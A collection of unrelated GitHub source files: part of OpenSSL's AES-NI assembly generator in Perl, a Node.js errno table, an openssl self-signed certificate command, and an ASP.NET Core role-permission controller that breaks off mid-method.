xorps $rndkey1,$inout3
movups 0x40($inp),$rndkey1
xorps $rndkey0,$inout4
movups 0x50($inp),$rndkey0
xorps $rndkey1,$inout5
movups 0x60($inp),$iv # IV
xorps $rndkey0,$inout6
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
movups $inout5,0x50($out)
lea 0x60($out),$out
movaps $inout6,$inout0
sub \$0x70,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_one:
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
xorps $iv,$inout0
movaps $in0,$iv
sub \$0x10,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_two:
xorps $inout2,$inout2
call _aesni_decrypt3
xorps $iv,$inout0
xorps $in0,$inout1
movups $inout0,($out)
movaps $in1,$iv
movaps $inout1,$inout0
lea 0x10($out),$out
sub \$0x20,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_three:
call _aesni_decrypt3
xorps $iv,$inout0
xorps $in0,$inout1
movups $inout0,($out)
xorps $in1,$inout2
movups $inout1,0x10($out)
movaps $in2,$iv
movaps $inout2,$inout0
lea 0x20($out),$out
sub \$0x30,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_four:
call _aesni_decrypt4
xorps $iv,$inout0
movups 0x30($inp),$iv
xorps $in0,$inout1
movups $inout0,($out)
xorps $in1,$inout2
movups $inout1,0x10($out)
xorps $in2,$inout3
movups $inout2,0x20($out)
movaps $inout3,$inout0
lea 0x30($out),$out
sub \$0x40,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_five:
xorps $inout5,$inout5
call _aesni_decrypt6
movups 0x10($inp),$rndkey1
movups 0x20($inp),$rndkey0
xorps $iv,$inout0
xorps $in0,$inout1
xorps $rndkey1,$inout2
movups 0x30($inp),$rndkey1
xorps $rndkey0,$inout3
movups 0x40($inp),$iv
xorps $rndkey1,$inout4
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
lea 0x40($out),$out
movaps $inout4,$inout0
sub \$0x50,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_six:
call _aesni_decrypt6
movups 0x10($inp),$rndkey1
movups 0x20($inp),$rndkey0
xorps $iv,$inout0
xorps $in0,$inout1
xorps $rndkey1,$inout2
movups 0x30($inp),$rndkey1
xorps $rndkey0,$inout3
movups 0x40($inp),$rndkey0
xorps $rndkey1,$inout4
movups 0x50($inp),$iv
xorps $rndkey0,$inout5
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
movups $inout4,0x40($out)
lea 0x50($out),$out
movaps $inout5,$inout0
sub \$0x60,$len
jmp .Lcbc_dec_tail_collected
.align 16
.Lcbc_dec_tail_collected:
and \$15,$len
movups $iv,($ivp)
jnz .Lcbc_dec_tail_partial
movups $inout0,($out)
jmp .Lcbc_dec_ret
.align 16
.Lcbc_dec_tail_partial:
movaps $inout0,$reserved(%rsp)
mov \$16,%rcx
mov $out,%rdi
sub $len,%rcx
lea $reserved(%rsp),%rsi
.long 0x9066A4F3 # rep movsb
.Lcbc_dec_ret:
___
$code.=<<___ if ($win64);
movaps (%rsp),%xmm6
movaps 0x10(%rsp),%xmm7
movaps 0x20(%rsp),%xmm8
movaps 0x30(%rsp),%xmm9
lea 0x58(%rsp),%rsp
___
$code.=<<___;
.Lcbc_ret:
ret
.size ${PREFIX}_cbc_encrypt,.-${PREFIX}_cbc_encrypt
___
}
# int $PREFIX_set_[en|de]crypt_key (const unsigned char *userKey,
# int bits, AES_KEY *key)
{ my ($inp,$bits,$key) = @_4args;
$bits =~ s/%r/%e/;
$code.=<<___;
.globl ${PREFIX}_set_decrypt_key
.type ${PREFIX}_set_decrypt_key,\@abi-omnipotent
.align 16
${PREFIX}_set_decrypt_key:
.byte 0x48,0x83,0xEC,0x08 # sub rsp,8
call __aesni_set_encrypt_key
shl \$4,$bits # rounds-1 after _aesni_set_encrypt_key
test %eax,%eax
jnz .Ldec_key_ret
lea 16($key,$bits),$inp # points at the end of key schedule
$movkey ($key),%xmm0 # just swap
$movkey ($inp),%xmm1
$movkey %xmm0,($inp)
$movkey %xmm1,($key)
lea 16($key),$key
lea -16($inp),$inp
.Ldec_key_inverse:
$movkey ($key),%xmm0 # swap and inverse
$movkey ($inp),%xmm1
aesimc %xmm0,%xmm0
aesimc %xmm1,%xmm1
lea 16($key),$key
lea -16($inp),$inp
$movkey %xmm0,16($inp)
$movkey %xmm1,-16($key)
cmp $key,$inp
ja .Ldec_key_inverse
$movkey ($key),%xmm0 # inverse middle
aesimc %xmm0,%xmm0
$movkey %xmm0,($inp)
.Ldec_key_ret:
add \$8,%rsp
ret
.LSEH_end_set_decrypt_key:
.size ${PREFIX}_set_decrypt_key,.-${PREFIX}_set_decrypt_key
___
# This is based on submission by
#
# Huang Ying <[email protected]>
# Vinodh Gopal <[email protected]>
# Kahraman Akdemir
#
# Agressively optimized in respect to aeskeygenassist's critical path
# and is contained in %xmm0-5 to meet Win64 ABI requirement.
#
$code.=<<___;
.globl ${PREFIX}_set_encrypt_key
.type ${PREFIX}_set_encrypt_key,\@abi-omnipotent
.align 16
${PREFIX}_set_encrypt_key:
__aesni_set_encrypt_key:
.byte 0x48,0x83,0xEC,0x08 # sub rsp,8
mov \$-1,%rax
test $inp,$inp
jz .Lenc_key_ret
test $key,$key
jz .Lenc_key_ret
movups ($inp),%xmm0 # pull first 128 bits of *userKey
xorps %xmm4,%xmm4 # low dword of xmm4 is assumed 0
lea 16($key),%rax
cmp \$256,$bits
je .L14rounds
cmp \$192,$bits
je .L12rounds
cmp \$128,$bits
jne .Lbad_keybits
.L10rounds:
mov \$9,$bits # 10 rounds for 128-bit key
$movkey %xmm0,($key) # round 0
aeskeygenassist \$0x1,%xmm0,%xmm1 # round 1
call .Lkey_expansion_128_cold
aeskeygenassist \$0x2,%xmm0,%xmm1 # round 2
call .Lkey_expansion_128
aeskeygenassist \$0x4,%xmm0,%xmm1 # round 3
call .Lkey_expansion_128
aeskeygenassist \$0x8,%xmm0,%xmm1 # round 4
call .Lkey_expansion_128
aeskeygenassist \$0x10,%xmm0,%xmm1 # round 5
call .Lkey_expansion_128
aeskeygenassist \$0x20,%xmm0,%xmm1 # round 6
call .Lkey_expansion_128
aeskeygenassist \$0x40,%xmm0,%xmm1 # round 7
call .Lkey_expansion_128
aeskeygenassist \$0x80,%xmm0,%xmm1 # round 8
call .Lkey_expansion_128
aeskeygenassist \$0x1b,%xmm0,%xmm1 # round 9
call .Lkey_expansion_128
aeskeygenassist \$0x36,%xmm0,%xmm1 # round 10
call .Lkey_expansion_128
$movkey %xmm0,(%rax)
mov $bits,80(%rax) # 240(%rdx)
xor %eax,%eax
jmp .Lenc_key_ret
.align 16
.L12rounds:
movq 16($inp),%xmm2 # remaining 1/3 of *userKey
mov \$11,$bits # 12 rounds for 192
$movkey %xmm0,($key) # round 0
aeskeygenassist \$0x1,%xmm2,%xmm1 # round 1,2
call .Lkey_expansion_192a_cold
aeskeygenassist \$0x2,%xmm2,%xmm1 # round 2,3
call .Lkey_expansion_192b
aeskeygenassist \$0x4,%xmm2,%xmm1 # round 4,5
call .Lkey_expansion_192a
aeskeygenassist \$0x8,%xmm2,%xmm1 # round 5,6
call .Lkey_expansion_192b
aeskeygenassist \$0x10,%xmm2,%xmm1 # round 7,8
call .Lkey_expansion_192a
aeskeygenassist \$0x20,%xmm2,%xmm1 # round 8,9
call .Lkey_expansion_192b
aeskeygenassist \$0x40,%xmm2,%xmm1 # round 10,11
call .Lkey_expansion_192a
aeskeygenassist \$0x80,%xmm2,%xmm1 # round 11,12
call .Lkey_expansion_192b
$movkey %xmm0,(%rax)
mov $bits,48(%rax) # 240(%rdx)
xor %rax, %rax
jmp .Lenc_key_ret
.align 16
.L14rounds:
movups 16($inp),%xmm2 # remaning half of *userKey
mov \$13,$bits # 14 rounds for 256
lea 16(%rax),%rax
$movkey %xmm0,($key) # round 0
$movkey %xmm2,16($key) # round 1
aeskeygenassist \$0x1,%xmm2,%xmm1 # round 2
call .Lkey_expansion_256a_cold
aeskeygenassist \$0x1,%xmm0,%xmm1 # round 3
call .Lkey_expansion_256b
aeskeygenassist \$0x2,%xmm2,%xmm1 # round 4
call .Lkey_expansion_256a
aeskeygenassist \$0x2,%xmm0,%xmm1 # round 5
call .Lkey_expansion_256b
aeskeygenassist \$0x4,%xmm2,%xmm1 # round 6
call .Lkey_expansion_256a
aeskeygenassist \$0x4,%xmm0,%xmm1 # round 7
call .Lkey_expansion_256b
aeskeygenassist \$0x8,%xmm2,%xmm1 # round 8
call .Lkey_expansion_256a
aeskeygenassist \$0x8,%xmm0,%xmm1 # round 9
call .Lkey_expansion_256b
aeskeygenassist \$0x10,%xmm2,%xmm1 # round 10
call .Lkey_expansion_256a
aeskeygenassist \$0x10,%xmm0,%xmm1 # round 11
call .Lkey_expansion_256b
aeskeygenassist \$0x20,%xmm2,%xmm1 # round 12
call .Lkey_expansion_256a
aeskeygenassist \$0x20,%xmm0,%xmm1 # round 13
call .Lkey_expansion_256b
aeskeygenassist \$0x40,%xmm2,%xmm1 # round 14
call .Lkey_expansion_256a
$movkey %xmm0,(%rax)
mov $bits,16(%rax) # 240(%rdx)
xor %rax,%rax
jmp .Lenc_key_ret
.align 16
.Lbad_keybits:
mov \$-2,%rax
.Lenc_key_ret:
add \$8,%rsp
ret
.LSEH_end_set_encrypt_key:
.align 16
.Lkey_expansion_128:
$movkey %xmm0,(%rax)
lea 16(%rax),%rax
.Lkey_expansion_128_cold:
shufps \$0b00010000,%xmm0,%xmm4
xorps %xmm4, %xmm0
shufps \$0b10001100,%xmm0,%xmm4
xorps %xmm4, %xmm0
shufps \$0b11111111,%xmm1,%xmm1 # critical path
xorps %xmm1,%xmm0
ret
.align 16
.Lkey_expansion_192a:
$movkey %xmm0,(%rax)
lea 16(%rax),%rax
.Lkey_expansion_192a_cold:
movaps %xmm2, %xmm5
.Lkey_expansion_192b_warm:
shufps \$0b00010000,%xmm0,%xmm4
movdqa %xmm2,%xmm3
xorps %xmm4,%xmm0
shufps \$0b10001100,%xmm0,%xmm4
pslldq \$4,%xmm3
xorps %xmm4,%xmm0
pshufd \$0b01010101,%xmm1,%xmm1 # critical path
pxor %xmm3,%xmm2
pxor %xmm1,%xmm0
pshufd \$0b11111111,%xmm0,%xmm3
pxor %xmm3,%xmm2
ret
.align 16
.Lkey_expansion_192b:
movaps %xmm0,%xmm3
shufps \$0b01000100,%xmm0,%xmm5
$movkey %xmm5,(%rax)
shufps \$0b01001110,%xmm2,%xmm3
$movkey %xmm3,16(%rax)
lea 32(%rax),%rax
jmp .Lkey_expansion_192b_warm
.align 16
.Lkey_expansion_256a:
$movkey %xmm2,(%rax)
lea 16(%rax),%rax
.Lkey_expansion_256a_cold:
shufps \$0b00010000,%xmm0,%xmm4
xorps %xmm4,%xmm0
shufps \$0b10001100,%xmm0,%xmm4
xorps %xmm4,%xmm0
shufps \$0b11111111,%xmm1,%xmm1 # critical path
xorps %xmm1,%xmm0
ret
.align 16
.Lkey_expansion_256b:
$movkey %xmm0,(%rax)
lea 16(%rax),%rax
shufps \$0b00010000,%xmm2,%xmm4
xorps %xmm4,%xmm2
shufps \$0b10001100,%xmm2,%xmm4
xorps %xmm4,%xmm2
shufps \$0b10101010,%xmm1,%xmm1 # critical path
xorps %xmm1,%xmm2
ret
.size ${PREFIX}_set_encrypt_key,.-${PREFIX}_set_encrypt_key
.size __aesni_set_encrypt_key,.-__aesni_set_encrypt_key
___
}
$code.=<<___;
.align 64
.Lbswap_mask:
.byte 15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,0
.Lincrement32:
.long 6,6,6,0
.Lincrement64:
.long 1,0,0,0
.Lxts_magic:
.long 0x87,0,1,0
.asciz "AES for Intel AES-NI, CRYPTOGAMS by <appro\@openssl.org>"
.align 64
___
# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
# CONTEXT *context,DISPATCHER_CONTEXT *disp)
if ($win64) {
$rec="%rcx";
$frame="%rdx";
$context="%r8";
$disp="%r9";
$code.=<<___;
.extern __imp_RtlVirtualUnwind
___
$code.=<<___ if ($PREFIX eq "aesni");
.type ecb_ccm64_se_handler,\@abi-omnipotent
.align 16
ecb_ccm64_se_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 120($context),%rax # pull context->Rax
mov 248($context),%rbx # pull context->Rip
mov 8($disp),%rsi # disp->ImageBase
mov 56($disp),%r11 # disp->HandlerData
mov 0(%r11),%r10d # HandlerData[0]
lea (%rsi,%r10),%r10 # prologue label
cmp %r10,%rbx # context->Rip<prologue label
jb .Lcommon_seh_tail
mov 152($context),%rax # pull context->Rsp
mov 4(%r11),%r10d # HandlerData[1]
lea (%rsi,%r10),%r10 # epilogue label
cmp %r10,%rbx # context->Rip>=epilogue label
jae .Lcommon_seh_tail
lea 0(%rax),%rsi # %xmm save area
lea 512($context),%rdi # &context.Xmm6
mov \$8,%ecx # 4*sizeof(%xmm0)/sizeof(%rax)
.long 0xa548f3fc # cld; rep movsq
lea 0x58(%rax),%rax # adjust stack pointer
jmp .Lcommon_seh_tail
.size ecb_ccm64_se_handler,.-ecb_ccm64_se_handler
.type ctr32_se_handler,\@abi-omnipotent
.align 16
ctr32_se_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 120($context),%rax # pull context->Rax
mov 248($context),%rbx # pull context->Rip
lea .Lctr32_body(%rip),%r10
cmp %r10,%rbx # context->Rip<"prologue" label
jb .Lcommon_seh_tail
mov 152($context),%rax # pull context->Rsp
lea .Lctr32_ret(%rip),%r10
cmp %r10,%rbx
jae .Lcommon_seh_tail
lea 0x20(%rax),%rsi # %xmm save area
lea 512($context),%rdi # &context.Xmm6
mov \$20,%ecx # 10*sizeof(%xmm0)/sizeof(%rax)
.long 0xa548f3fc # cld; rep movsq
lea 0xc8(%rax),%rax # adjust stack pointer
jmp .Lcommon_seh_tail
.size ctr32_se_handler,.-ctr32_se_handler
.type xts_se_handler,\@abi-omnipotent
.align 16
xts_se_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 120($context),%rax # pull context->Rax
mov 248($context),%rbx # pull context->Rip
mov 8($disp),%rsi # disp->ImageBase
mov 56($disp),%r11 # disp->HandlerData
mov 0(%r11),%r10d # HandlerData[0]
lea (%rsi,%r10),%r10 # prologue lable
cmp %r10,%rbx # context->Rip<prologue label
jb .Lcommon_seh_tail
mov 152($context),%rax # pull context->Rsp
mov 4(%r11),%r10d # HandlerData[1]
lea (%rsi,%r10),%r10 # epilogue label
cmp %r10,%rbx # context->Rip>=epilogue label
jae .Lcommon_seh_tail
lea 0x60(%rax),%rsi # %xmm save area
lea 512($context),%rdi # & context.Xmm6
mov \$20,%ecx # 10*sizeof(%xmm0)/sizeof(%rax)
.long 0xa548f3fc # cld; rep movsq
lea 0x68+160(%rax),%rax # adjust stack pointer
jmp .Lcommon_seh_tail
.size xts_se_handler,.-xts_se_handler
___
$code.=<<___;
.type cbc_se_handler,\@abi-omnipotent
.align 16
cbc_se_handler:
push %rsi
push %rdi
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
pushfq
sub \$64,%rsp
mov 152($context),%rax # pull context->Rsp
mov 248($context),%rbx # pull context->Rip
lea .Lcbc_decrypt(%rip),%r10
cmp %r10,%rbx # context->Rip<"prologue" label
jb .Lcommon_seh_tail
lea .Lcbc_decrypt_body(%rip),%r10
cmp %r10,%rbx # context->Rip<cbc_decrypt_body
jb .Lrestore_cbc_rax
lea .Lcbc_ret(%rip),%r10
cmp %r10,%rbx # context->Rip>="epilogue" label
jae .Lcommon_seh_tail
lea 0(%rax),%rsi # top of stack
lea 512($context),%rdi # &context.Xmm6
mov \$8,%ecx # 4*sizeof(%xmm0)/sizeof(%rax)
.long 0xa548f3fc # cld; rep movsq
lea 0x58(%rax),%rax # adjust stack pointer
jmp .Lcommon_seh_tail
.Lrestore_cbc_rax:
mov 120($context),%rax
.Lcommon_seh_tail:
mov 8(%rax),%rdi
mov 16(%rax),%rsi
mov %rax,152($context) # restore context->Rsp
mov %rsi,168($context) # restore context->Rsi
mov %rdi,176($context) # restore context->Rdi
mov 40($disp),%rdi # disp->ContextRecord
mov $context,%rsi # context
mov \$154,%ecx # sizeof(CONTEXT)
.long 0xa548f3fc # cld; rep movsq
mov $disp,%rsi
xor %rcx,%rcx # arg1, UNW_FLAG_NHANDLER
mov 8(%rsi),%rdx # arg2, disp->ImageBase
mov 0(%rsi),%r8 # arg3, disp->ControlPc
mov 16(%rsi),%r9 # arg4, disp->FunctionEntry
mov 40(%rsi),%r10 # disp->ContextRecord
lea 56(%rsi),%r11 # &disp->HandlerData
lea 24(%rsi),%r12 # &disp->EstablisherFrame
mov %r10,32(%rsp) # arg5
mov %r11,40(%rsp) # arg6
mov %r12,48(%rsp) # arg7
mov %rcx,56(%rsp) # arg8, (NULL)
call *__imp_RtlVirtualUnwind(%rip)
mov \$1,%eax # ExceptionContinueSearch
add \$64,%rsp
popfq
pop %r15
pop %r14
pop %r13
pop %r12
pop %rbp
pop %rbx
pop %rdi
pop %rsi
ret
.size cbc_se_handler,.-cbc_se_handler
.section .pdata
.align 4
___
$code.=<<___ if ($PREFIX eq "aesni");
.rva .LSEH_begin_aesni_ecb_encrypt
.rva .LSEH_end_aesni_ecb_encrypt
.rva .LSEH_info_ecb
.rva .LSEH_begin_aesni_ccm64_encrypt_blocks
.rva .LSEH_end_aesni_ccm64_encrypt_blocks
.rva .LSEH_info_ccm64_enc
.rva .LSEH_begin_aesni_ccm64_decrypt_blocks
.rva .LSEH_end_aesni_ccm64_decrypt_blocks
.rva .LSEH_info_ccm64_dec
.rva .LSEH_begin_aesni_ctr32_encrypt_blocks
.rva .LSEH_end_aesni_ctr32_encrypt_blocks
.rva .LSEH_info_ctr32
.rva .LSEH_begin_aesni_xts_encrypt
.rva .LSEH_end_aesni_xts_encrypt
.rva .LSEH_info_xts_enc
.rva .LSEH_begin_aesni_xts_decrypt
.rva .LSEH_end_aesni_xts_decrypt
.rva .LSEH_info_xts_dec
___
$code.=<<___;
.rva .LSEH_begin_${PREFIX}_cbc_encrypt
.rva .LSEH_end_${PREFIX}_cbc_encrypt
.rva .LSEH_info_cbc
.rva ${PREFIX}_set_decrypt_key
.rva .LSEH_end_set_decrypt_key
.rva .LSEH_info_key
.rva ${PREFIX}_set_encrypt_key
.rva .LSEH_end_set_encrypt_key
.rva .LSEH_info_key
.section .xdata
.align 8
___
$code.=<<___ if ($PREFIX eq "aesni");
.LSEH_info_ecb:
.byte 9,0,0,0
.rva ecb_ccm64_se_handler
.rva .Lecb_enc_body,.Lecb_enc_ret # HandlerData[]
.LSEH_info_ccm64_enc:
.byte 9,0,0,0
.rva ecb_ccm64_se_handler
.rva .Lccm64_enc_body,.Lccm64_enc_ret # HandlerData[]
.LSEH_info_ccm64_dec:
.byte 9,0,0,0
.rva ecb_ccm64_se_handler
.rva .Lccm64_dec_body,.Lccm64_dec_ret # HandlerData[]
.LSEH_info_ctr32:
.byte 9,0,0,0
.rva ctr32_se_handler
.LSEH_info_xts_enc:
.byte 9,0,0,0
.rva xts_se_handler
.rva .Lxts_enc_body,.Lxts_enc_epilogue # HandlerData[]
.LSEH_info_xts_dec:
.byte 9,0,0,0
.rva xts_se_handler
.rva .Lxts_dec_body,.Lxts_dec_epilogue # HandlerData[]
___
$code.=<<___;
.LSEH_info_cbc:
.byte 9,0,0,0
.rva cbc_se_handler
.LSEH_info_key:
.byte 0x01,0x04,0x01,0x00
.byte 0x04,0x02,0x00,0x00 # sub rsp,8
___
}
sub rex {
local *opcode=shift;
my ($dst,$src)=@_;
my $rex=0;
$rex|=0x04 if($dst>=8);
$rex|=0x01 if($src>=8);
push @opcode,$rex|0x40 if($rex);
}
sub aesni {
my $line=shift;
my @opcode=(0x66);
if ($line=~/(aeskeygenassist)\s+\$([x0-9a-f]+),\s*%xmm([0-9]+),\s*%xmm([0-9]+)/) {
rex(\@opcode,$4,$3);
push @opcode,0x0f,0x3a,0xdf;
push @opcode,0xc0|($3&7)|(($4&7)<<3); # ModR/M
my $c=$2;
push @opcode,$c=~/^0/?oct($c):$c;
return ".byte\t".join(',',@opcode);
}
elsif ($line=~/(aes[a-z]+)\s+%xmm([0-9]+),\s*%xmm([0-9]+)/) {
my %opcodelet = (
"aesimc" => 0xdb,
"aesenc" => 0xdc, "aesenclast" => 0xdd,
"aesdec" => 0xde, "aesdeclast" => 0xdf
);
return undef if (!defined($opcodelet{$1}));
rex(\@opcode,$3,$2);
push @opcode,0x0f,0x38,$opcodelet{$1};
push @opcode,0xc0|($2&7)|(($3&7)<<3); # ModR/M
return ".byte\t".join(',',@opcode);
}
return $line;
}
$code =~ s/\`([^\`]*)\`/eval($1)/gem;
$code =~ s/\b(aes.*%xmm[0-9]+).*$/aesni($1)/gem;
print $code;
close STDOUT;
| {
"pile_set_name": "Github"
} |
var all = module.exports.all = [
{
errno: -2,
code: 'ENOENT',
description: 'no such file or directory'
},
{
errno: -1,
code: 'UNKNOWN',
description: 'unknown error'
},
{
errno: 0,
code: 'OK',
description: 'success'
},
{
errno: 1,
code: 'EOF',
description: 'end of file'
},
{
errno: 2,
code: 'EADDRINFO',
description: 'getaddrinfo error'
},
{
errno: 3,
code: 'EACCES',
description: 'permission denied'
},
{
errno: 4,
code: 'EAGAIN',
description: 'resource temporarily unavailable'
},
{
errno: 5,
code: 'EADDRINUSE',
description: 'address already in use'
},
{
errno: 6,
code: 'EADDRNOTAVAIL',
description: 'address not available'
},
{
errno: 7,
code: 'EAFNOSUPPORT',
description: 'address family not supported'
},
{
errno: 8,
code: 'EALREADY',
description: 'connection already in progress'
},
{
errno: 9,
code: 'EBADF',
description: 'bad file descriptor'
},
{
errno: 10,
code: 'EBUSY',
description: 'resource busy or locked'
},
{
errno: 11,
code: 'ECONNABORTED',
description: 'software caused connection abort'
},
{
errno: 12,
code: 'ECONNREFUSED',
description: 'connection refused'
},
{
errno: 13,
code: 'ECONNRESET',
description: 'connection reset by peer'
},
{
errno: 14,
code: 'EDESTADDRREQ',
description: 'destination address required'
},
{
errno: 15,
code: 'EFAULT',
description: 'bad address in system call argument'
},
{
errno: 16,
code: 'EHOSTUNREACH',
description: 'host is unreachable'
},
{
errno: 17,
code: 'EINTR',
description: 'interrupted system call'
},
{
errno: 18,
code: 'EINVAL',
description: 'invalid argument'
},
{
errno: 19,
code: 'EISCONN',
description: 'socket is already connected'
},
{
errno: 20,
code: 'EMFILE',
description: 'too many open files'
},
{
errno: 21,
code: 'EMSGSIZE',
description: 'message too long'
},
{
errno: 22,
code: 'ENETDOWN',
description: 'network is down'
},
{
errno: 23,
code: 'ENETUNREACH',
description: 'network is unreachable'
},
{
errno: 24,
code: 'ENFILE',
description: 'file table overflow'
},
{
errno: 25,
code: 'ENOBUFS',
description: 'no buffer space available'
},
{
errno: 26,
code: 'ENOMEM',
description: 'not enough memory'
},
{
errno: 27,
code: 'ENOTDIR',
description: 'not a directory'
},
{
errno: 28,
code: 'EISDIR',
description: 'illegal operation on a directory'
},
{
errno: 29,
code: 'ENONET',
description: 'machine is not on the network'
},
{
errno: 31,
code: 'ENOTCONN',
description: 'socket is not connected'
},
{
errno: 32,
code: 'ENOTSOCK',
description: 'socket operation on non-socket'
},
{
errno: 33,
code: 'ENOTSUP',
description: 'operation not supported on socket'
},
{
errno: 34,
code: 'ENOENT',
description: 'no such file or directory'
},
{
errno: 35,
code: 'ENOSYS',
description: 'function not implemented'
},
{
errno: 36,
code: 'EPIPE',
description: 'broken pipe'
},
{
errno: 37,
code: 'EPROTO',
description: 'protocol error'
},
{
errno: 38,
code: 'EPROTONOSUPPORT',
description: 'protocol not supported'
},
{
errno: 39,
code: 'EPROTOTYPE',
description: 'protocol wrong type for socket'
},
{
errno: 40,
code: 'ETIMEDOUT',
description: 'connection timed out'
},
{
errno: 41,
code: 'ECHARSET',
description: 'invalid Unicode character'
},
{
errno: 42,
code: 'EAIFAMNOSUPPORT',
description: 'address family for hostname not supported'
},
{
errno: 44,
code: 'EAISERVICE',
description: 'servname not supported for ai_socktype'
},
{
errno: 45,
code: 'EAISOCKTYPE',
description: 'ai_socktype not supported'
},
{
errno: 46,
code: 'ESHUTDOWN',
description: 'cannot send after transport endpoint shutdown'
},
{
errno: 47,
code: 'EEXIST',
description: 'file already exists'
},
{
errno: 48,
code: 'ESRCH',
description: 'no such process'
},
{
errno: 49,
code: 'ENAMETOOLONG',
description: 'name too long'
},
{
errno: 50,
code: 'EPERM',
description: 'operation not permitted'
},
{
errno: 51,
code: 'ELOOP',
description: 'too many symbolic links encountered'
},
{
errno: 52,
code: 'EXDEV',
description: 'cross-device link not permitted'
},
{
errno: 53,
code: 'ENOTEMPTY',
description: 'directory not empty'
},
{
errno: 54,
code: 'ENOSPC',
description: 'no space left on device'
},
{
errno: 55,
code: 'EIO',
description: 'i/o error'
},
{
errno: 56,
code: 'EROFS',
description: 'read-only file system'
},
{
errno: 57,
code: 'ENODEV',
description: 'no such device'
},
{
errno: 58,
code: 'ESPIPE',
description: 'invalid seek'
},
{
errno: 59,
code: 'ECANCELED',
description: 'operation canceled'
}
]
module.exports.errno = {}
module.exports.code = {}
all.forEach(function (error) {
module.exports.errno[error.errno] = error
module.exports.code[error.code] = error
})
module.exports.custom = require('./custom')(module.exports)
module.exports.create = module.exports.custom.createError
| {
"pile_set_name": "Github"
} |
openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem
| {
"pile_set_name": "Github"
} |
using System;
using System.Linq;
using System.Threading.Tasks;
using CoreDX.Application.EntityFrameworkCore;
using CoreDX.Domain.Entity.Permission;
using Microsoft.AspNetCore.Mvc;
using Microsoft.AspNetCore.Mvc.Rendering;
using Microsoft.EntityFrameworkCore;
namespace IdentityServer.Areas.Manage.Controllers
{
[Area("Manage")]
public class RolePermissionDeclarationController : Controller
{
private readonly ApplicationPermissionDbContext _permissionDbContext;
private readonly ApplicationIdentityDbContext _identityDbContext;
public RolePermissionDeclarationController(ApplicationPermissionDbContext permissionDbContext, ApplicationIdentityDbContext identityDbContext)
{
_permissionDbContext = permissionDbContext;
_identityDbContext = identityDbContext;
}
// GET: Manage/RolePermissionDeclaration
public async Task<IActionResult> Index()
{
var applicationIdentityDbContext = _permissionDbContext.RolePermissionDeclarations.Include(r => r.PermissionDefinition);
return View(await applicationIdentityDbContext.ToListAsync());
}
// GET: Manage/RolePermissionDeclaration/Details/5
public async Task<IActionResult> Details(int? permissionDefinitionId, int? roleId)
{
if (permissionDefinitionId == null || roleId == null)
{
return NotFound();
}
var rolePermissionDeclaration = await _permissionDbContext.RolePermissionDeclarations
.Include(r => r.PermissionDefinition)
.FirstOrDefaultAsync(m => m.PermissionDefinitionId == permissionDefinitionId && m.RoleId == roleId);
if (rolePermissionDeclaration == null)
{
return NotFound();
}
return View(rolePermissionDeclaration);
}
// GET: Manage/RolePermissionDeclaration/Create
public IActionResult Create()
{
ViewData["PermissionDefinition"] = new SelectList(_permissionDbContext.PermissionDefinitions, "Id", "Name");
ViewData["Role"] = new SelectList(_identityDbContext.Roles, "Id", "Name");
return View();
}
// POST: Manage/RolePermissionDeclaration/Create
// To protect from overposting attacks, please enable the specific properties you want to bind to, for
// more details see http://go.microsoft.com/fwlink/?LinkId=317598.
[HttpPost]
[ValidateAntiForgeryToken]
public async Task<IActionResult> Create([Bind("RoleId,PermissionValue,PermissionDefinitionId,Id,Remark,OrderNumber,RowVersion,IsEnable,IsDeleted,CreationTime,LastModificationTime,CreatorId,LastModificationUserId")] RolePermissionDeclaration rolePermissionDeclaration)
{
if (ModelState.IsValid)
{
_permissionDbContext.Add(rolePermissionDeclaration);
await _permissionDbContext.SaveChangesAsync();
return RedirectToAction(nameof(Index));
}
ViewData["PermissionDefinition"] = new SelectList(_permissionDbContext.PermissionDefinitions, "Id", "Name", rolePermissionDeclaration.PermissionDefinitionId);
ViewData["Role"] = new SelectList(_identityDbContext.Roles, "Id", "Name", rolePermissionDeclaration.RoleId);
return View(rolePermissionDeclaration);
}
// GET: Manage/RolePermissionDeclaration/Edit/5
public async Task<IActionResult> Edit(Guid? id)
{
if (id == null)
{
return NotFound();
}
var rolePermissionDeclaration = await _permissionDbContext.RolePermissionDeclarations.FindAsync(id);
if (rolePermissionDeclaration == null)
{
return NotFound();
}
ViewData["PermissionDefinition"] = new SelectList(_permissionDbContext.PermissionDefinitions, "Id", "Name", rolePermissionDeclaration.PermissionDefinitionId);
ViewData["Role"] = new SelectList(_identityDbContext.Roles, "Id", "Name", rolePermissionDeclaration.RoleId);
return View(rolePermissionDeclaration);
}
// POST: Manage/RolePermissionDeclaration/Edit/5
// To protect from overposting attacks, please enable the specific properties you want to bind to, for
// more details see http://go.microsoft.com/fwlink/?LinkId=317598.
[HttpPost]
[ValidateAntiForgeryToken]
public async Task<IActionResult> Edit(int permissionDefinitionId, [Bind("RoleId,PermissionValue,PermissionDefinitionId,Id,Remark,OrderNumber,RowVersion,IsEnable,IsDeleted,CreationTime,LastModificationTime,CreatorId,LastModificationUserId")] RolePermissionDeclaration rolePermissionDeclaration)
{
if (permissionDefinitionId != rolePermissionDeclaration.PermissionDefinitionId)
{
return NotFound();
}
if (ModelState.IsValid)
{
try
{
